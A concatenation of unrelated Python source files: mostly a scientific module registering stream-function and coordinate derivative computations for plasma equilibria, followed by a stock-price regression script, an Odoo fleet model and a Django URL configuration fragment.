label="\\partial_{\\rho \\rho \\theta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third derivative, wrt radius twice "
"and poloidal angle",
dim=1,
params=["L_lmn"],
transforms={"L": [[2, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rrt(params, transforms, profiles, data, **kwargs):
data["lambda_rrt"] = transforms["L"].transform(params["L_lmn"], 2, 1, 0)
return data
@register_compute_fun(
name="lambda_rrz",
label="\\partial_{\\rho \\rho \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third derivative, wrt radius twice "
"and toroidal angle",
dim=1,
params=["L_lmn"],
transforms={"L": [[2, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rrz(params, transforms, profiles, data, **kwargs):
data["lambda_rrz"] = transforms["L"].transform(params["L_lmn"], 2, 0, 1)
return data
@register_compute_fun(
name="lambda_rt",
label="\\partial_{\\rho \\theta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, second derivative wrt radius and "
"poloidal angle",
dim=1,
params=["L_lmn"],
transforms={"L": [[1, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rt(params, transforms, profiles, data, **kwargs):
data["lambda_rt"] = transforms["L"].transform(params["L_lmn"], 1, 1, 0)
return data
@register_compute_fun(
name="lambda_rtt",
label="\\partial_{\\rho \\theta \\theta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third derivative wrt radius and "
"poloidal angle twice",
dim=1,
params=["L_lmn"],
transforms={"L": [[1, 2, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rtt(params, transforms, profiles, data, **kwargs):
data["lambda_rtt"] = transforms["L"].transform(params["L_lmn"], 1, 2, 0)
return data
@register_compute_fun(
name="lambda_rtz",
label="\\partial_{\\rho \\theta \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third derivative wrt radius, poloidal "
" angle, and toroidal angle",
dim=1,
params=["L_lmn"],
transforms={"L": [[1, 1, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rtz(params, transforms, profiles, data, **kwargs):
data["lambda_rtz"] = transforms["L"].transform(params["L_lmn"], 1, 1, 1)
return data
@register_compute_fun(
name="lambda_rz",
label="\\partial_{\\rho \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, second derivative wrt radius and "
"toroidal angle",
dim=1,
params=["L_lmn"],
transforms={"L": [[1, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rz(params, transforms, profiles, data, **kwargs):
data["lambda_rz"] = transforms["L"].transform(params["L_lmn"], 1, 0, 1)
return data
@register_compute_fun(
name="lambda_rzz",
label="\\partial_{\\rho \\zeta \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third derivative wrt radius and "
"toroidal angle twice",
dim=1,
params=["L_lmn"],
transforms={"L": [[1, 0, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rzz(params, transforms, profiles, data, **kwargs):
data["lambda_rzz"] = transforms["L"].transform(params["L_lmn"], 1, 0, 2)
return data
@register_compute_fun(
name="lambda_t",
label="\\partial_{\\theta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, first poloidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_t(params, transforms, profiles, data, **kwargs):
data["lambda_t"] = transforms["L"].transform(params["L_lmn"], 0, 1, 0)
return data
@register_compute_fun(
name="lambda_tt",
label="\\partial_{\\theta \\theta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, second poloidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 2, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_tt(params, transforms, profiles, data, **kwargs):
data["lambda_tt"] = transforms["L"].transform(params["L_lmn"], 0, 2, 0)
return data
@register_compute_fun(
name="lambda_ttt",
label="\\partial_{\\theta \\theta \\theta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third poloidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 3, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_ttt(params, transforms, profiles, data, **kwargs):
data["lambda_ttt"] = transforms["L"].transform(params["L_lmn"], 0, 3, 0)
return data
@register_compute_fun(
name="lambda_ttz",
label="\\partial_{\\theta \\theta \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third derivative wrt poloidal angle "
"twice and toroidal angle",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 2, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_ttz(params, transforms, profiles, data, **kwargs):
data["lambda_ttz"] = transforms["L"].transform(params["L_lmn"], 0, 2, 1)
return data
@register_compute_fun(
name="lambda_tz",
label="\\partial_{\\theta \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, second derivative wrt poloidal and "
"toroidal angles",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 1, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_tz(params, transforms, profiles, data, **kwargs):
data["lambda_tz"] = transforms["L"].transform(params["L_lmn"], 0, 1, 1)
return data
@register_compute_fun(
name="lambda_tzz",
label="\\partial_{\\theta \\zeta \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third derivative wrt poloidal angle "
"and toroidal angle twice",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 1, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_tzz(params, transforms, profiles, data, **kwargs):
data["lambda_tzz"] = transforms["L"].transform(params["L_lmn"], 0, 1, 2)
return data
@register_compute_fun(
name="lambda_z",
label="\\partial_{\\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, first toroidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_z(params, transforms, profiles, data, **kwargs):
data["lambda_z"] = transforms["L"].transform(params["L_lmn"], 0, 0, 1)
return data
@register_compute_fun(
name="lambda_zz",
label="\\partial_{\\zeta \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, second toroidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 0, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_zz(params, transforms, profiles, data, **kwargs):
data["lambda_zz"] = transforms["L"].transform(params["L_lmn"], 0, 0, 2)
return data
@register_compute_fun(
name="lambda_zzz",
label="\\partial_{\\zeta \\zeta \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third toroidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 0, 3]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_zzz(params, transforms, profiles, data, **kwargs):
data["lambda_zzz"] = transforms["L"].transform(params["L_lmn"], 0, 0, 3)
return data
@register_compute_fun(
name="omega",
label="\\omega",
units="rad",
units_long="radians",
description="Toroidal stream function",
dim=1,
params=[], # ["W_lmn"],
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega(params, transforms, profiles, data, **kwargs):
data["omega"] = data["0"]
return data
@register_compute_fun(
name="omega_r",
label="\\partial_{\\rho} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, first radial derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_r(params, transforms, profiles, data, **kwargs):
data["omega_r"] = data["0"]
return data
@register_compute_fun(
name="omega_rr",
label="\\partial_{\\rho \\rho} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, second radial derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rr(params, transforms, profiles, data, **kwargs):
data["omega_rr"] = data["0"]
return data
@register_compute_fun(
name="omega_rrr",
label="\\partial_{\rho \\rho \\rho} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third radial derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rrr(params, transforms, profiles, data, **kwargs):
data["omega_rrr"] = data["0"]
return data
@register_compute_fun(
name="omega_rrrr",
label="\\partial_{\rho \\rho \\rho \\rho} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, fourth radial derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rrrr(params, transforms, profiles, data, **kwargs):
data["omega_rrrr"] = data["0"]
return data
@register_compute_fun(
name="omega_rrrt",
label="\\partial_{\rho \\rho \\rho \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, fourth derivative wrt radial coordinate"
" thrice and poloidal once",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rrrt(params, transforms, profiles, data, **kwargs):
data["omega_rrrt"] = data["0"]
return data
@register_compute_fun(
name="omega_rrrz",
label="\\partial_{\rho \\rho \\rho \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, fourth derivative wrt radial coordinate"
" thrice and toroidal once",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rrrz(params, transforms, profiles, data, **kwargs):
data["omega_rrrz"] = data["0"]
return data
@register_compute_fun(
name="omega_rrt",
label="\\partial_{\\rho \\rho \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative, wrt radius twice "
"and poloidal angle",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rrt(params, transforms, profiles, data, **kwargs):
data["omega_rrt"] = data["0"]
return data
@register_compute_fun(
name="omega_rrtt",
label="\\partial_{\\rho \\rho \\theta \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, fourth derivative, wrt radius twice "
"and poloidal angle twice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rrtt(params, transforms, profiles, data, **kwargs):
data["omega_rrtt"] = data["0"]
return data
@register_compute_fun(
name="omega_rrtz",
label="\\partial_{\\rho \\theta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, fourth derivative wrt radius twice,"
" poloidal angle, and toroidal angle",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rrtz(params, transforms, profiles, data, **kwargs):
data["omega_rrtz"] = data["0"]
return data
@register_compute_fun(
name="omega_rrz",
label="\\partial_{\\rho \\rho \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative, wrt radius twice "
"and toroidal angle",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rrz(params, transforms, profiles, data, **kwargs):
data["omega_rrz"] = data["0"]
return data
@register_compute_fun(
name="omega_rrzz",
label="\\partial_{\\rho \\rho \\zeta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, fourth derivative, wrt radius twice "
"and toroidal angle twice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rrzz(params, transforms, profiles, data, **kwargs):
data["omega_rrzz"] = data["0"]
return data
@register_compute_fun(
name="omega_rt",
label="\\partial_{\\rho \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, second derivative wrt radius and "
"poloidal angle",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rt(params, transforms, profiles, data, **kwargs):
data["omega_rt"] = data["0"]
return data
@register_compute_fun(
name="omega_rtt",
label="\\partial_{\\rho \\theta \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative wrt radius and "
"poloidal angle twice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rtt(params, transforms, profiles, data, **kwargs):
data["omega_rtt"] = data["0"]
return data
@register_compute_fun(
name="omega_rttt",
label="\\partial_{\\rho \\theta \\theta \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative wrt radius and "
"poloidal angle thrice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rttt(params, transforms, profiles, data, **kwargs):
data["omega_rttt"] = data["0"]
return data
@register_compute_fun(
name="omega_rttz",
label="\\partial_{\\rho \\theta \\theta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, fourth derivative wrt radius once, "
"poloidal angle twice, and toroidal angle once",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rttz(params, transforms, profiles, data, **kwargs):
data["omega_rttz"] = data["0"]
return data
@register_compute_fun(
name="omega_rtz",
label="\\partial_{\\rho \\theta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative wrt radius, poloidal"
" angle, and toroidal angle",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rtz(params, transforms, profiles, data, **kwargs):
data["omega_rtz"] = data["0"]
return data
@register_compute_fun(
name="omega_rtzz",
label="\\partial_{\\rho \\theta \\zeta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, fourth derivative wrt radius, poloidal"
" angle, and toroidal angle twice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rtzz(params, transforms, profiles, data, **kwargs):
data["omega_rtzz"] = data["0"]
return data
@register_compute_fun(
name="omega_rz",
label="\\partial_{\\rho \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, second derivative wrt radius and "
"toroidal angle",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rz(params, transforms, profiles, data, **kwargs):
data["omega_rz"] = data["0"]
return data
@register_compute_fun(
name="omega_rzz",
label="\\partial_{\\rho \\zeta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative wrt radius and "
"toroidal angle twice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rzz(params, transforms, profiles, data, **kwargs):
data["omega_rzz"] = data["0"]
return data
@register_compute_fun(
name="omega_rzzz",
label="\\partial_{\\rho \\zeta \\zeta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative wrt radius and "
"toroidal angle thrice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_rzzz(params, transforms, profiles, data, **kwargs):
data["omega_rzzz"] = data["0"]
return data
@register_compute_fun(
name="omega_t",
label="\\partial_{\\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, first poloidal derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_t(params, transforms, profiles, data, **kwargs):
data["omega_t"] = data["0"]
return data
@register_compute_fun(
name="omega_tt",
label="\\partial_{\\theta \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, second poloidal derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_tt(params, transforms, profiles, data, **kwargs):
data["omega_tt"] = data["0"]
return data
@register_compute_fun(
name="omega_ttt",
label="\\partial_{\\theta \\theta \\theta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third poloidal derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_ttt(params, transforms, profiles, data, **kwargs):
data["omega_ttt"] = data["0"]
return data
@register_compute_fun(
name="omega_ttz",
label="\\partial_{\\theta \\theta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative wrt poloidal angle "
"twice and toroidal angle",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_ttz(params, transforms, profiles, data, **kwargs):
data["omega_ttz"] = data["0"]
return data
@register_compute_fun(
name="omega_tz",
label="\\partial_{\\theta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, second derivative wrt poloidal and "
"toroidal angles",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_tz(params, transforms, profiles, data, **kwargs):
data["omega_tz"] = data["0"]
return data
@register_compute_fun(
name="omega_tzz",
label="\\partial_{\\theta \\zeta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third derivative wrt poloidal angle "
"and toroidal angle twice",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_tzz(params, transforms, profiles, data, **kwargs):
data["omega_tzz"] = data["0"]
return data
@register_compute_fun(
name="omega_z",
label="\\partial_{\\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, first toroidal derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_z(params, transforms, profiles, data, **kwargs):
data["omega_z"] = data["0"]
return data
@register_compute_fun(
name="omega_zz",
label="\\partial_{\\zeta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, second toroidal derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_zz(params, transforms, profiles, data, **kwargs):
data["omega_zz"] = data["0"]
return data
@register_compute_fun(
name="omega_zzz",
label="\\partial_{\\zeta \\zeta \\zeta} \\omega",
units="rad",
units_long="radians",
description="Toroidal stream function, third toroidal derivative",
dim=1,
params=[], # ["W_lmn"]
transforms={},
profiles=[],
coordinates="rtz",
data=["0"],
)
def _omega_zzz(params, transforms, profiles, data, **kwargs):
data["omega_zzz"] = data["0"]
return data
@register_compute_fun(
name="phi",
label="\\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["zeta", "omega"],
)
def _phi(params, transforms, profiles, data, **kwargs):
data["phi"] = data["zeta"] + data["omega"]
return data
@register_compute_fun(
name="phi_r",
label="\\partial_{\\rho} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, derivative wrt radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_r"],
)
def _phi_r(params, transforms, profiles, data, **kwargs):
data["phi_r"] = data["omega_r"]
return data
@register_compute_fun(
name="phi_rr",
label="\\partial_{\\rho \\rho} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, second derivative wrt radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_rr"],
)
def _phi_rr(params, transforms, profiles, data, **kwargs):
data["phi_rr"] = data["omega_rr"]
return data
@register_compute_fun(
name="phi_rt",
label="\\partial_{\\rho \\theta} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, second derivative wrt radial and "
"poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_rt"],
)
def _phi_rt(params, transforms, profiles, data, **kwargs):
data["phi_rt"] = data["omega_rt"]
return data
@register_compute_fun(
name="phi_rz",
label="\\partial_{\\rho \\zeta} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, second derivative wrt radial and "
"toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_rz"],
)
def _phi_rz(params, transforms, profiles, data, **kwargs):
data["phi_rz"] = data["omega_rz"]
return data
@register_compute_fun(
name="phi_t",
label="\\partial_{\\theta} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, derivative wrt poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_t"],
)
def _phi_t(params, transforms, profiles, data, **kwargs):
data["phi_t"] = data["omega_t"]
return data
@register_compute_fun(
name="phi_tt",
label="\\partial_{\\theta \\theta} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, second derivative wrt poloidal "
"coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_tt"],
)
def _phi_tt(params, transforms, profiles, data, **kwargs):
data["phi_tt"] = data["omega_tt"]
return data
@register_compute_fun(
name="phi_tz",
label="\\partial_{\\theta \\zeta} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, second derivative wrt poloidal and "
"toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_tz"],
)
def _phi_tz(params, transforms, profiles, data, **kwargs):
data["phi_tz"] = data["omega_tz"]
return data
@register_compute_fun(
name="phi_z",
label="\\partial_{\\zeta} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, derivative wrt toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_z"],
)
def _phi_z(params, transforms, profiles, data, **kwargs):
data["phi_z"] = 1 + data["omega_z"]
return data
@register_compute_fun(
name="phi_zz",
label="\\partial_{\\zeta \\zeta} \\phi",
units="rad",
units_long="radians",
description="Toroidal angle in lab frame, second derivative wrt toroidal "
"coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["omega_zz"],
)
def _phi_zz(params, transforms, profiles, data, **kwargs):
data["phi_zz"] = data["omega_zz"]
return data
@register_compute_fun(
name="rho",
label="\\rho",
units="~",
units_long="None",
description="Radial coordinate, proportional to the square root "
+ "of the toroidal flux",
dim=1,
params=[],
transforms={"grid": []},
profiles=[],
coordinates="r",
data=[],
)
def _rho(params, transforms, profiles, data, **kwargs):
data["rho"] = transforms["grid"].nodes[:, 0]
return data
@register_compute_fun(
name="rho_r",
label="\\partial_{\\rho} \\rho",
units="~",
units_long="None",
description="Radial coordinate, proportional to the square root "
+ "of the toroidal flux, derivative wrt radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="r",
data=["0"],
)
def _rho_r(params, transforms, profiles, data, **kwargs):
data["rho_r"] = jnp.ones_like(data["0"])
return data
@register_compute_fun(
name="rho_t",
label="\\partial_{\\theta} \\rho",
units="~",
units_long="None",
description="Radial coordinate, proportional to the square root "
"of the toroidal flux, derivative wrt poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="r",
data=["0"],
)
def _rho_t(params, transforms, profiles, data, **kwargs):
data["rho_t"] = data["0"]
return data
@register_compute_fun(
name="rho_z",
label="\\partial_{\\zeta} \\rho",
units="~",
units_long="None",
description="Radial coordinate, proportional to the square root "
"of the toroidal flux, derivative wrt toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="r",
data=["0"],
)
def _rho_z(params, transforms, profiles, data, **kwargs):
data["rho_z"] = data["0"]
return data
@register_compute_fun(
name="theta",
label="\\theta",
units="rad",
units_long="radians",
description="Poloidal angular coordinate (geometric, not magnetic)",
dim=1,
params=[],
transforms={"grid": []},
profiles=[],
coordinates="t",
data=[],
)
def _theta(params, transforms, profiles, data, **kwargs):
data["theta"] = transforms["grid"].nodes[:, 1]
return data
@register_compute_fun(
name="theta_PEST",
label="\\vartheta",
units="rad",
units_long="radians",
description="PEST straight field line poloidal angular coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["theta", "lambda"],
)
def _theta_PEST(params, transforms, profiles, data, **kwargs):
data["theta_PEST"] = (data["theta"] + data["lambda"]) % (2 * jnp.pi)
return data
@register_compute_fun(
name="theta_PEST_r",
label="\\partial_{\\rho} \\vartheta",
units="rad",
units_long="radians",
description="PEST straight field line poloidal angular coordinate, derivative wrt "
"radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["lambda_r"],
)
def _theta_PEST_r(params, transforms, profiles, data, **kwargs):
data["theta_PEST_r"] = data["lambda_r"]
return data
@register_compute_fun(
name="theta_PEST_t",
label="\\partial_{\\theta} \\vartheta",
units="rad",
units_long="radians",
description="PEST straight field line poloidal angular coordinate, derivative wrt "
"poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["lambda_t"],
)
def _theta_PEST_t(params, transforms, profiles, data, **kwargs):
data["theta_PEST_t"] = 1 + data["lambda_t"]
return data
@register_compute_fun(
name="theta_PEST_z",
label="\\partial_{\\zeta} \\vartheta",
units="rad",
units_long="radians",
description="PEST straight field line poloidal angular coordinate, derivative wrt "
"toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["lambda_z"],
)
def _theta_PEST_z(params, transforms, profiles, data, **kwargs):
data["theta_PEST_z"] = data["lambda_z"]
return data
@register_compute_fun(
name="theta_r",
label="\\partial_{\\rho} \\theta",
units="rad",
units_long="radians",
description="Poloidal angular coordinate (geometric, not magnetic), "
"derivative wrt radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="t",
data=["0"],
)
def _theta_r(params, transforms, profiles, data, **kwargs):
data["theta_r"] = data["0"]
return data
@register_compute_fun(
name="theta_t",
label="\\partial_{\\theta} \\theta",
units="rad",
units_long="radians",
description="Poloidal angular coordinate (geometric, not magnetic), "
"derivative wrt poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="t",
data=["0"],
)
def _theta_t(params, transforms, profiles, data, **kwargs):
data["theta_t"] = jnp.ones_like(data["0"])
return data
@register_compute_fun(
name="theta_z",
label="\\partial_{\\zeta} \\theta",
units="rad",
units_long="radians",
description="Poloidal angular coordinate (geometric, not magnetic), "
"derivative wrt toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="t",
data=["0"],
)
def _theta_z(params, transforms, profiles, data, **kwargs):
data["theta_z"] = data["0"]
return data
@register_compute_fun(
name="zeta",
label="\\zeta",
units="rad",
units_long="radians",
description="Toroidal angular coordinate",
dim=1,
params=[],
transforms={"grid": []},
profiles=[],
coordinates="z",
data=[],
)
def _zeta(params, transforms, profiles, data, **kwargs):
data["zeta"] = transforms["grid"].nodes[:, 2]
return data
@register_compute_fun(
name="zeta_r",
label="\\partial_{\\rho} \\zeta",
units="rad",
units_long="radians",
description="Toroidal angular coordinate derivative, wrt radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="z",
data=["0"],
)
def _zeta_r(params, transforms, profiles, data, **kwargs):
data["zeta_r"] = data["0"]
return data
@register_compute_fun(
name="zeta_t",
label="\\partial_{\\theta} \\zeta",
units="rad",
units_long="radians",
description="Toroidal angular coordinate, derivative wrt poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="z",
data=["0"],
)
def _zeta_t(params, transforms, profiles, data, **kwargs):
data["zeta_t"] = data["0"]
return data
@register_compute_fun(
name="zeta_z",
label="\\partial_{\\zeta} \\zeta",
units="rad",
units_long="radians",
description="Toroidal angular coordinate, derivative wrt toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="z",
data=["0"],
)
def _zeta_z(params, transforms, profiles, data, **kwargs):
data["zeta_z"] = jnp.ones_like(data["0"])
return data
|
19,255 | a280e5c5034ceff3aaa51c2155191f65378337a9 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 29 01:09:04 2018
@author: aditi
"""
'''
This program trains linear model and prints
confidence on both test and cross validation set '
The plot_result function prints the actual and
predicted price for the next day
'''
import data_prep
from sklearn import linear_model
import pandas as pd
from matplotlib import pyplot as plt ,style
pd.options.mode.chained_assignment = None # default='warn'
style.use('ggplot')
def train(filename):
df = data_prep.get_data(filename)
[X, y] = data_prep.features(df)
[X_train, X_test, X_cross] = data_prep.feature_scaling(X)
[y_train, y_test, y_cross] = data_prep.data_set(y)
lm = linear_model.LinearRegression()
model = lm.fit(X_train.values,y_train.values) # training model on training set
predictions = model.predict(X_test.values)
print("confidence on test set is ",lm.score(X_test.values, y_test.values)*100)
predictions = model.predict(X_cross.values)
print("confidence on cross validation set is ",lm.score(X_cross.values ,y_cross.values)*100)
y_cross['predictions'] = predictions
return y_cross
def plot_result(filename):
y_cross = train(filename)
y_cross['1DayW'].plot()
plt.legend(loc=4)
y_cross['predictions'].plot(color ='b')
plt.legend(loc=4)
plt.xlabel('Date')
plt.ylabel('Price')
plt.show()
|
19,256 | 3ab3c1267a2fd4fa07c55d1a4ce4956e7612fcc8 | # -*- coding: utf-8 -*-
from odoo import models, fields, api
class tms_vehicle_red_tape_type(models.Model):
_name='fleet.vehicle.red_tape_type'
_inherit =['mail.thread']
name=fields.Char(string='Nombre')
parent_id=fields.Many2one('fleet.vehicle.red_tape_type',string='Padre')
tipo= fields.Selection(selection=[('view', 'Ver'),('normal', 'Normal') ],string='Tipo',default='view')
notes=fields.Text(string='Notas')
active = fields.Boolean(string='Outsourcing?')
|
19,257 | bd9198869ab441e801bf7b87d5a9babb08ef4e6e | from django.urls import include, path
from . import views
urlpatterns = [
path('', views.homePageView, name='index'),
path('apiresults/', views.searchCloudView, name='apiresults'),
path('vagresults/', views.vagrantObjectsView, name='vagresults'),
